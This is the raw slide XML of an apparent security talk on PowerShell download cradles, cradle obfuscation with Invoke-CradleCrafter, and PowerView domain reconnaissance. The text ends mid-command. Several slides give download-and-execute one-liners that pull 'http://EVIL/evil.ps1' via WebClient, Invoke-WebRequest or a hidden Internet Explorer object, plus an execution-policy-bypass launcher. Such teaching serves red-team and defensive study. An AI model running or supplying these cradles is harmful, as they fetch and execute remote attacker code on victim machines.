                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05606CD-904D-4AD5-8543-725FDB78CE58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4672668" y="1772114"/>
            <a:ext cx="7401189" cy="4813243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FDD8DF-3CEE-4B1D-B853-DF3B0E2236AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11182526" y="6306304"/>
            <a:ext cx="891331" cy="25167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 name="Arrow: Left 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B258B7B4-93D5-4059-AD30-65F4BAFC053E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="600822">
            <a:off x="4354253" y="3930291"/>
            <a:ext cx="3680900" cy="175605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HUH?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77989503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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="94736"/>
            <a:ext cx="12109142" cy="1482394"/>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4000" dirty="0"/>
              <a:t>Powershell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Download Cradles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{699F9F92-0A83-4463-BFE2-F7751AB043CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290864" y="1400594"/>
            <a:ext cx="4847004" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Makes use of PSH Invoke-Expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stems ?from? Raphael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Mudge’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> talk on continuously staging external PSH Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>runspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> instance provides an execution context for the PSH pipeline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04D55E93-1C4F-4A24-A09A-B2F5F82D2B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181576" y="1400594"/>
            <a:ext cx="6971274" cy="4915800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D44E6548-FE5B-49BB-AB54-72A6C0F7A152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7006942" y="4655442"/>
            <a:ext cx="3740776" cy="1203752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4D646A-85A9-4102-A330-42555A9EB30D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2599654" y="6606709"/>
            <a:ext cx="9474591" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Flying a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Cylon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Raider -  https://www.youtube.com/watch?v=26PedM_-zRo&amp;feature=youtu.be</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132705138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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="94736"/>
            <a:ext cx="12109142" cy="1482394"/>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4000" dirty="0"/>
              <a:t>Powershell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Download Cradles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71CFF19-8733-4DCF-85C1-CB944C763010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1719744" y="6385543"/>
            <a:ext cx="9244668" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>moar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> here --&gt; https://gist.github.com/HarmJ0y/bb48307ffa663256e239</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{699F9F92-0A83-4463-BFE2-F7751AB043CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="39149" y="1606763"/>
            <a:ext cx="13078437" cy="4216539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t># normal download cradle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Net.Webclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>downloadstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://EVIL/evil.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t># PowerShell 3.0+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>IEX (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>iwr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> 'http://EVIL/evil.ps1’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t># hidden IE com object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=New-Object -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>comobject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>InternetExplorer.Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ie.visible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=$False;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ie.navigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>('http://EVIL/evil.ps1');start-sleep -s 5;$r=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ie.Document.body.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ie.quit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>();IEX $r</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Up 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58BAE6D2-77D9-434B-8997-7C7D8C6A7005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9006111" y="2645435"/>
            <a:ext cx="2357307" cy="2139193"/>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Hosted PSH Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189831757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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326988" y="16778"/>
            <a:ext cx="7538024" cy="735774"/>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4000" dirty="0"/>
              <a:t> Cradle Crafter + Obfuscator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71CFF19-8733-4DCF-85C1-CB944C763010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3145872" y="6424710"/>
            <a:ext cx="9244668" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>https://github.com/danielbohannon/Invoke-CradleCrafter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1729EE8E-86F7-41CC-AA91-989ABFA1842F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051375" y="807793"/>
            <a:ext cx="9851545" cy="5459351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53051064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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="94736"/>
            <a:ext cx="12109142" cy="1482394"/>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Network Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>PowerView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> ~ Chaining commands together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71CFF19-8733-4DCF-85C1-CB944C763010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118143" y="1772115"/>
            <a:ext cx="4519240" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetForestTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetDomainTrust</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> -exec bypass -c "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
